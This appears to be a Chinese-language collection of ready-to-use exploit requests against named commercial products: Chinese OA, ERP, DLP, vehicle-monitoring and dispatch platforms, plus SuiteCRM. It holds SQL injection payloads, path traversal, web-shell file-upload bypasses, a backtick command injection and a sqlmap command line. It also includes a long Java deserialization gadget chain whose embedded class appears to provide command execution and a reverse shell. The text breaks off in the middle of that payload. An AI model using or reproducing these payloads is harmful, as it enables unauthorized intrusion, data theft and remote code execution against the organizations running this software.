七、通天星CMSV6车载定位监控平台disable存在SQL注入GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Connection: closeX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip, deflate
八、AnalyticsCloud 分析云存在任意文件读取漏洞 GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
九、、SuiteCRM responseEntryPoint存在SQL注入漏洞GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+&type=c&response=accept HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close
十、亿赛通数据泄露防护(DLP)系统NetSecConfigAjax接口存在SQL注入漏洞 POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host: Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-
十一、用友NC querygoodsgridbycode存在SQL注入漏洞 GET /ecp/productonsale/querygoodsgridbycode.json? code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C% 7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976% 3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCH R%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1 Host: Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Pragma: no-cache Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cache-Control: no-cache
十二、云课网校系统uploadImage存在任意文件上传漏洞 POST /api/uploader/uploadImage HTTP/1.1 Host: xx.xx.xx.xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m x-requested-with: XMLHttpRequest ------WebKitFormBoundaryLZbmKeasWgo2gPtU Content-Disposition: form-data; name="file"; filename="1G3311040N.php" Content-Type: image/gif ------WebKitFormBoundaryLZbmKeasWgo2gPtU--
浪潮云财务系统路径 /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx /cwbase/service/rps/xtdysrv.asmx
POST /InputServlet?action=12 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Content-Type: multipart/form-data; boundary=00content0boundary00 Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 241 Connection: close --00content0boundary00 Content-Disposition: form-data; name="upsize" 1024 --00content0boundary00 Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\2211.jsp" Content-Type: image/jpeg 123 --00content0boundary00--
十五、启明星辰 天玥网络安全审计系统 SQL 注入漏洞 app="启明星辰-天玥网络安全审计" python3 sqlmap.py -r test.txt --batch --skip-waf --random-agent --dbs --force-ssl POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Connection: close checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
十六、致远 OA fileUpload.do 前台文件上传绕过漏洞 POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1 1 Host: 2 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 3 Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary 4 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30) --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="type" --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="extensions" png--skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="applicationCategory" --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="destDirectory" --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="destFilename" --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="maxSize" --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="isEncrypt" false --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="file1"; filename="1.png" 36 Content-Type: Content-Type: application/pdf <% out.println("hello test");%> --skdHHhNHjhnUgerSexsksboundary--
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) method=uploadMenuIcon&fileid=id值&filename=testqqww.jsp
/seeyon/main/menuIcon/a123.jsp
十七、指挥调度平台invite_one_member存在远程命令执行漏洞GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt`HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2Upgrade-Insecure-Requests: 1
GET /api/client/audiobroadcast/1.txt HTTP/1.1 Host: {hostname} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 Upgrade-Insecure-Requests: 1
十八、指挥调度平台ajax_users存在SQL注入漏洞 POST /app/ext/ajax_users.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL--
十九、锐捷 RG-NBS2026G-P交换机WEB 管理ping.htm未授权访问漏洞二十、万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入 漏洞/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
二十一、用友U8 Cloud MonitorServlet 存在反序列化漏洞 POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 Host: {hostname} Cmd: whoami Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 16284
{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x0 0\x00xpw\x0c\x00\x00\x00\x02? @\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8 a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03m apt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyM apn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/colle ctions/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0 \xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00[Lorg/apache/commons/collections/Transformer;xpur\x00[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\ x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11 A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00 javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:or g.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00 \x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/S tring; [\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX \x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.C lass;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\ x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x 01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x0 0\x18\x00\x00\x00\x01t45try \x7b\x0a load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29 \x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a var theUnsafeMethod = java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x2 9;\x0a theUnsafeMethod.setAccessible\x28true\x29; \x0a return theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction removeClassCache\x28clazz\x29\x7b\x0a var unsafe = getUnsafe\x28\x29;\x0a var clazzAnonymousClass = unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29 .getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a var reflectionDataField = clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29; \x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a var reflectionClass;\x0a try \x7b\x0a reflectionClass = java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a \x7d catch \x28error\x29 \x7b\x0a reflectionClass = java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a \x7d\x0a var unsafe = getUnsafe\x28\x29;\x0a var classBuffer = reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x 0a var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass, classBuffer, null\x29;\x0a var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a var methodFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a if \x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28 \"java.util.HashMap\"\x29\x29\x29 \x7b\x0a unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28fieldFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance \x28\x29\x29;\x0a \x7d\x0a if \x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x2 8\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28methodFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance \x28\x29\x29;\x0a \x7d\x0a removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0a function setAccessible\x28accessibleObject\x29\x7b\x0a var unsafe = getUnsafe\x28\x29;\x0a var overrideField = java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\ x28\"override\"\x29;\x0a var offset = unsafe.objectFieldOffset\x28overrideField\x29;\x0a unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction defineClass\x28bytes\x29\x7b\x0a var clz = null;\x0a var version = java.lang.System.getProperty\x28\"java.version\"\x29;\x0a var unsafe = getUnsafe\x28\x29;\x0a var classLoader = new java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forNa me\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a try\x7b\x0a if \x28version.split\x28\".\"\x29[0] >= 11\x29 \x7b\x0a bypassReflectionFilter\x28\x29;\x0a defineClassMethod = java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineC lass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE, java.lang.Integer.TYPE\x29;\x0a setAccessible\x28defineClassMethod\x29;\x0a // \xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a clz = defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a \x7delse\x7b\x0a var protectionDomain = new java.security.ProtectionDomain\x28new java.security.CodeSource\x28null, java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert. Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a clz = unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader, protectionDomain\x29;\x0a \x7d\x0a \x7dcatch\x28error\x29\x7b\x0a error.printStackTrace\x28\x29;\x0a \x7dfinally\x7b\x0a return clz;\x0a \x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a var bt;\x0a try\x7b\x0a bt = java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuf fer\x28str\x29;\x0a \x7dcatch\x28e\x29\x7b\x7d\x0a if \x28bt == null\x29\x7b\x0a try\x7b\x0a bt = java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\ x29.decode\x28str\x29;\x0a \x7dcatch\x28e\x29\x7b\x7d\x0a \x7d\x0a if\x28bt == null\x29\x7b\x0a try\x7b\x0a bt = java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a \x7dcatch\x28e\x29\x7b\x7d\x0a \x7d\x0a if \x28bt == null\x29\x7b\x0a bt = java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x 28\x29.decode\x28str\x29;\x0a \x7d\x0a return bt;\x0a\x7d\x0avar code=\"yv66vgAAADEBmgoAHgCtCgBDAK4KAEMArwoAHgCwCACxCgAcALIKALMAtAoAswC1BwC2CgBDALcIAKUK ACEAuAgAuQgAugcAuwgAvAgAvQcAvgoAHAC/CADACADBBwDCCwAWAMMLAMQAxQsAxADGCADHCADIBwDJCgAcAMo HAMsKAMwAzQgAzgcAzwgA0AoAjwDRCgAhANIIANMJANQA1QoA1ADWCADXCgCPANgKABwA2QgA2gcA2woAHADcCA DdBwDeCADfCADgCgAcAOEHAOIKAEMA4woA5ADYCADlCgAhAOYIAOcKACEA6AgA6QoAIQDqCgCPAOsIAOwKACEA7 QgA7gkAjwDvCgDUAPAJAI8A8QcA8goAQwDzCgBDAPQIAKYIAPUIAPYKAI8A9wgA+AoAjwD5BwD6CgBMAPsHAPwK AE4A/QoAjwD+CgBOAP8KAE4BAAoATgEBCgAvAQIKAEwBAwoAIQEECAEFCgEGAQcKACEBCAgBCQgBCggBCwcBDAo AXQCtCgBdAQ0IAQ4KAF0BAggBDwgBEAgBEQgBEgoBEwEUCgETARUHARYKARcBGAoAaAEZCAEaCgBoARsKAGgAxQ oAaAEcCgEXAR0KARcBHggBHwgBIAoBEwEhBwEiCgB0ASMKAHQBGAoBFwEkCgB0ASQKAHQBJQoBJgEnCgEmASgKA SkBKgoBKQEABQAAAAAAAAAyCgBDASsKARcBLAoAdAEBCAEtCgAvAS4IAS8IATAKANQBMQoAjwEyCAEzCAE0CAE1CAE2CACpCAE3BwE4AQAMQkFTRTY0X0NIQVJTAQASTGphdmEvbGFuZy9TdHJpbmc7AQANQ29uc3RhbnRWYWx1ZQg BOQEAAmlwAQAEcG9ydAEAE0xqYXZhL2xhbmcvSW50ZWdlcjsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU 51bWJlclRhYmxlAQAKRXhjZXB0aW9ucwEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvb GFuZy9DbGFzczsBAAlTaWduYXR1cmUBACgoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M8Kj47 AQAFcHJveHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEABXdyaXRlAQA4KExqYXZ hL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAApjbGVhclBhcmFtAQ AEZXhlYwEAB3JldmVyc2UBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL1N0cmluZzsBAANydW4BA AZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAKU291cmNlRmlsZQEAB0E0LmphdmEMAJcAmAwBOgE7 DAE8AT0MAT4BPwEAB3RocmVhZHMMAUABQQcBQgwBQwFEDAFFAUYBABNbTGphdmEvbGFuZy9UaHJlYWQ7DAFHAUg MAUkBSgEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAdoYW5kbGVyAQAeam F2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFLAT8BAAZnbG9iYWwBAApwcm9jZXNzb3JzAQAOamF2YS91d GlsL0xpc3QMAUwBTQcBTgwBTwFQDAFRAVIBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwB UwFUAQAQamF2YS9sYW5nL09iamVjdAcBVQwBVgFXAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2N tZAwAoAChDAFYAVkBAAlzZXRTdGF0dXMHAVoMAVsBXAwBXQFeAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idW YuQnl0ZUNodW5rDACcAJ0MAV8BUgEACHNldEJ5dGVzAQACW0IMAWABVAEAB2RvV3JpdGUBABNqYXZhL2xhbmcvR XhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXAMAWEAnQEAIGphdmEvbGFuZy9DbGFzc05vdEZv dW5kRXhjZXB0aW9uDAFiAWMHAWQBAAAMAWUBZgEAEGNvbW1hbmQgbm90IG51bGwMAWcBSAEABSMjIyMjDAFoAWk MAKQAoQEAAToMAWoBawEAImNvbW1hbmQgcmV2ZXJzZSBob3N0IGZvcm1hdCBlcnJvciEMAJQAkQwBbAFtDACVAJ YBABBqYXZhL2xhbmcvVGhyZWFkDACXAW4MAW8AmAEABSQkJCQkAQASZmlsZSBmb3JtYXQgZXJyb3IhDACiAKMBA AVAQEBAQAwApQChAQAMamF2YS9pby9GaWxlDACXAXABABhqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW0MAJcBcQwA qQCqDACiAXIMAXMAmAwBdACYDAF1AUgMAXYBSAwBdwF4AQAHb3MubmFtZQcBeQwBegChDAF7AUgBAAN3aW4BAAR waW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBfAF9AQAFIC1uIDQBAAIvYwEABSAtdCA0AQACc2 gBAAItYwcBfgwBfwGADAClAYEBABFqYXZhL3V0aWwvU2Nhbm5lcgcBggwBgwGEDACXAYUBAAJcYQwBhgGHDAFRA UgMAYgBhAwBiQCYAQAHL2Jpbi9zaAEAB2NtZC5leGUMAKUBigEAD2phdmEvbmV0L1NvY2tldAwAlwGLDAGMAY0M AY4BUAcBjwwBkAGRDAGSAZEHAZMMAKIBlAwBlQGWDAGXAZEBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyA tPgwBmAFIAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAZkBkQwApgCnAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2 RlcgEADGRlY29kZUJ1ZmZlcgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAmb3JnLmFwYWNoZS5jb 21tb25zLmNvZGVjLmJpbmFyeS5CYXNlNjQBAAJBNAEAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVm Z2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1R ocmVhZDsBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAhnZXRDbGFzcwEAEy gpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2Y S9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAE KFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCg pTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZX RTdXBlcmNsYXNzAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7AQASamF2YS91dGlsL0l0ZXJhd G9yAQAHaGFzTmV4dAEAAygpWgEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChM amF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABh qYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbm cvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRCeXRlcwEABCgpW0IBABFqYXZhL2xhbmcvSW50ZWdlc gEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAL bmV3SW5zdGFuY2UBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXI BABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKE xqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBA AVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExq YXZhL2xhbmcvU3RyaW5nOylJAQAXKExqYXZhL2xhbmcvUnVubmFibGU7KVYBAAVzdGFydAEAFShMamF2YS9sYW5 nL1N0cmluZzspVgEAEShMamF2YS9pby9GaWxlOylWAQAFKFtCKVYBAAVmbHVzaAEABWNsb3NlAQAIdG9TdHJpbm cBAA9nZXRBYnNvbHV0ZVBhdGgBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhb mcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVy dHkBAAt0b0xvd2VyQ2FzZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmd CdWlsZGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOw EAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAD mdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07 KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAA5nZXR FcnJvclN0cmVhbQEAB2Rlc3Ryb3kBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAB YoTGphdmEvbGFuZy9TdHJpbmc7SSlWAQAPZ2V0T3V0cHV0U3RyZWFtAQAYKClMamF2YS9pby9PdXRwdXRTdHJlY W07AQAIaXNDbG9zZWQBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEAFGph dmEvaW8vT3V0cHV0U3RyZWFtAQAEKEkpVgEABXNsZWVwAQAEKEopVgEACWV4aXRWYWx1ZQEACmdldE1lc3NhZ2U BAAhpbnRWYWx1ZQAhAI8AHgABAA8AAwAaAJAAkQABAJIAAAACAJMAAgCUAJEAAAACAJUAlgAAAAkAAQCXAJgAAgCZAAADtgAGABMAAAKOKrcAAbgAArYAA0wrtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4tOgQZBL42BQM2BhUGF QWiAlgZBBUGMjoHGQfHAAanAkMZB7YACjoIGQgSC7YADJoADRkIEg22AAyaAAanAiUZB7YABBIOtgAGTSwEtgAH LBkHtgAIOgkZCcEAD5oABqcCAhkJtgAEEhC2AAZNLAS2AAcsGQm2AAg6CRkJtgAEEhG2AAZNpwAWOgoZCbYABLY AE7YAExIRtgAGTSwEtgAHLBkJtgAIOgkZCbYABLYAExIUtgAGTacAEDoKGQm2AAQSFLYABk0sBLYABywZCbYACD oJGQm2AAQSFbYABk0sBLYABywZCbYACMAAFsAAFjoKGQq5ABcBADoLGQu5ABgBAJkBWxkLuQAZAQA6DBkMtgAEE hq2AAZNLAS2AAcsGQy2AAg6DRkNtgAEEhsDvQActgAdGQ0DvQAetgAfOg4ZDbYABBIgBL0AHFkDEiFTtgAdGQ0E vQAeWQMSIlO2AB/AACE6DxkPxwAGp/+RKhkPtgAjtgAkOhAZDrYABBIlBL0AHFkDsgAmU7YAHRkOBL0AHlkDEQD IuAAnU7YAH1cqEii2ACk6ERkRtgAqOgkZERIrBr0AHFkDEixTWQSyACZTWQWyACZTtgAtGQkGvQAeWQMZEFNZBA O4ACdTWQUZEL64ACdTtgAfVxkOtgAEEi4EvQAcWQMZEVO2AB0ZDgS9AB5ZAxkJU7YAH1enAE86ESoSMLYAKToSG 